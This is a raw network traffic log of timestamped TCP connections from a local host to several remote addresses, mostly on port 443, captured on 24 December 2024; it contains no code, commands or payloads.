                                                                                        Dec 24, 2024 22:11:19.244187117 CET49764443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:19.244214058 CET49766443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:19.244997978 CET49767443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:19.246022940 CET44349765142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.246054888 CET49764443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:19.246062994 CET44349764142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.246092081 CET49765443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:19.252523899 CET49766443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:19.252531052 CET44349766142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.252756119 CET44349766142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.252870083 CET49766443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:19.254728079 CET49764443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:19.254733086 CET44349764142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.256088972 CET49766443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:19.256505013 CET49767443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:19.256517887 CET44349767142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.256730080 CET44349767142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.256793976 CET49765443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:19.256798029 CET44349765142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.256949902 CET49767443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:19.260796070 CET49767443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:19.269310951 CET49765443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:19.269316912 CET44349765142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.299372911 CET44349766142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:19.307323933 CET44349767142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.152667999 CET44349764142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.152724981 CET49764443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.152741909 CET44349764142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.152785063 CET49764443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.152892113 CET49764443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.152923107 CET44349764142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.152967930 CET49764443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.153450012 CET49774443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.153501987 CET44349774142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.153579950 CET49774443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.153776884 CET49774443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.153808117 CET44349774142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.178802013 CET44349766142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.178849936 CET44349766142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.178910971 CET49766443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.178932905 CET44349766142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.178980112 CET44349766142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.178987026 CET49766443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.179030895 CET49766443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.179706097 CET49766443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.179718971 CET44349766142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.180272102 CET49775443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.180303097 CET44349775142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.180423021 CET49775443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.180622101 CET49775443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.180646896 CET44349775142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.259577990 CET44349765142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.259633064 CET49765443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.259635925 CET44349765142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.259685040 CET49765443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.259752035 CET49765443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.259757042 CET44349765142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.259764910 CET49765443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.259797096 CET49765443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.260194063 CET49776443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.260270119 CET44349776142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.260344982 CET49776443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.260552883 CET49776443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:20.260590076 CET44349776142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.459799051 CET44349767142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.459849119 CET49767443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.459855080 CET44349767142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.459867001 CET44349767142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.459901094 CET49767443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.459933043 CET44349767142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.459991932 CET44349767142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.460035086 CET49767443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.460484028 CET49767443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.460494041 CET44349767142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.461335897 CET49777443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.461376905 CET44349777142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:20.462083101 CET49777443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.462387085 CET49777443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:20.462414980 CET44349777142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:21.492147923 CET49774443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:21.492182016 CET49775443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:21.492206097 CET49776443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:21.492264032 CET49777443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:21.492719889 CET49780443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:21.492769003 CET44349780142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:21.492826939 CET49780443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:30.184848070 CET49804443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:30.184915066 CET44349804142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:30.185739994 CET49804443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:30.185911894 CET49804443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:30.185950041 CET44349804142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:31.312824965 CET49801443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:31.312880039 CET49802443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:31.312880039 CET49803443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:31.312896967 CET49804443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:31.333704948 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:31.333748102 CET44349808142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:31.333898067 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:31.334367037 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:31.334379911 CET44349808142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:31.336425066 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:31.336477995 CET44349807142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:31.336601973 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:31.337447882 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:31.337475061 CET44349807142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:33.032865047 CET44349808142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:33.032943964 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:33.033620119 CET44349808142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:33.033680916 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:33.034543037 CET44349807142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:33.034626007 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:33.035322905 CET44349807142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:33.035389900 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:33.040327072 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:33.040363073 CET44349807142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:33.040630102 CET44349807142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:33.040690899 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:33.041435957 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:33.041446924 CET44349808142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:33.041668892 CET44349808142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:33.041717052 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:33.042355061 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:33.042567968 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:33.083374977 CET44349808142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:33.087372065 CET44349807142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.016726017 CET44349808142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.016782045 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.016796112 CET44349808142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.016979933 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.017241955 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.017282009 CET44349808142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.017388105 CET49808443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.017816067 CET49812443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.017905951 CET44349812142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.018337965 CET49812443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.018688917 CET49812443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.018723011 CET44349812142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.020740986 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:34.020761967 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.020957947 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:34.021483898 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:34.021512032 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.030289888 CET44349807142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.030360937 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.030385017 CET44349807142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.030523062 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.030777931 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.030827999 CET44349807142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.030962944 CET44349807142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.031050920 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.031050920 CET49807443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.031347990 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:34.031378031 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.031429052 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:34.031528950 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.031536102 CET44349815142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.031752110 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.032090902 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:34.032099009 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:34.032428026 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:34.032435894 CET44349815142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.710390091 CET44349812142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.710469007 CET49812443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:35.711482048 CET44349812142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.711546898 CET49812443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:35.714039087 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.714099884 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:35.714822054 CET49812443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:35.714845896 CET44349812142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.715188026 CET44349812142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.715257883 CET49812443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:35.715802908 CET49812443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:35.717278957 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:35.717289925 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.717554092 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.717637062 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:35.717967033 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:35.724069118 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.724122047 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:35.725632906 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:35.725644112 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.725866079 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.725913048 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:35.726253986 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:35.730227947 CET44349815142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.730300903 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:35.732919931 CET44349815142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.732976913 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:35.734368086 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:35.734371901 CET44349815142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.735171080 CET44349815142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.735235929 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:35.735613108 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:35.759324074 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.759367943 CET44349812142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.767357111 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:35.783343077 CET44349815142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.076406002 CET879049733103.36.221.195192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.116988897 CET497338790192.168.2.4103.36.221.195
                                                                                        Dec 24, 2024 22:11:36.619582891 CET44349812142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.619646072 CET49812443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.619740009 CET49812443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.619791031 CET44349812142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.619854927 CET49812443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.620331049 CET49818443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.620356083 CET44349818142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.620428085 CET49818443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.620651960 CET49818443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.620668888 CET44349818142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.734175920 CET44349815142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.735176086 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.735198021 CET44349815142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.735322952 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.735323906 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.735358953 CET44349815142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.735465050 CET49815443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.735858917 CET49819443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.735963106 CET44349819142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.736108065 CET49819443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.738682032 CET49819443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:36.738719940 CET44349819142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.760574102 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.760622025 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.760643005 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:36.760649920 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.760701895 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:36.760706902 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.760725975 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.760756016 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:36.760776997 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:36.761271954 CET49814443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:36.761282921 CET44349814142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.761751890 CET49820443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:36.761776924 CET44349820142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:36.762789011 CET49820443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:36.762926102 CET49820443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:36.762939930 CET44349820142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:37.009874105 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:37.009921074 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:37.009958029 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:37.010004044 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:37.010049105 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:37.010093927 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:37.010112047 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:37.010133028 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:37.010191917 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:37.010191917 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:37.010747910 CET49813443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:37.010773897 CET44349813142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:37.011204958 CET49821443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:37.011253119 CET44349821142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:37.011323929 CET49821443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:37.011549950 CET49821443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:37.011569023 CET44349821142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:37.039038897 CET49818443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:37.039076090 CET49820443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:37.039088964 CET49819443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:37.039155006 CET49821443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:37.040874958 CET49823443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:37.040877104 CET49822443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:37.040890932 CET44349822142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:37.040899992 CET44349823142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:37.040963888 CET49822443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:37.040966034 CET49823443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:37.041565895 CET49823443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:47.085499048 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:47.085504055 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.086148977 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:47.086152077 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.087794065 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.087805033 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.088085890 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.088128090 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.089422941 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.090109110 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.090158939 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.090379953 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.090426922 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.091207027 CET49844443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:47.131334066 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:47.131361961 CET44349844142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.095662117 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.096132994 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096157074 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.096328020 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096406937 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096455097 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.096674919 CET44349841142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.096736908 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096751928 CET49841443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096878052 CET49848443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.096982956 CET44349848142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.097059965 CET49848443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.097265005 CET49848443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.097306013 CET44349848142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.107784986 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.108001947 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108009100 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.108043909 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108177900 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108207941 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.108361959 CET44349843142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.108407021 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108414888 CET49843443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108581066 CET49849443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.108614922 CET44349849142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.112116098 CET49849443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.112344980 CET49849443192.168.2.4142.250.181.14
                                                                                        Dec 24, 2024 22:11:48.112356901 CET44349849142.250.181.14192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.131920099 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.131961107 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.132009983 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.132018089 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.132164001 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.132164001 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.132174015 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.132220030 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.132255077 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.132626057 CET49842443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.132636070 CET44349842142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.133001089 CET49850443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.133013964 CET44349850142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.133187056 CET49850443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.133393049 CET49850443192.168.2.4142.250.181.1
                                                                                        Dec 24, 2024 22:11:48.133399010 CET44349850142.250.181.1192.168.2.4
                                                                                        Dec 24, 2024 22:11:48.399121046 CET44349844142.250.181.1192.168.2.4
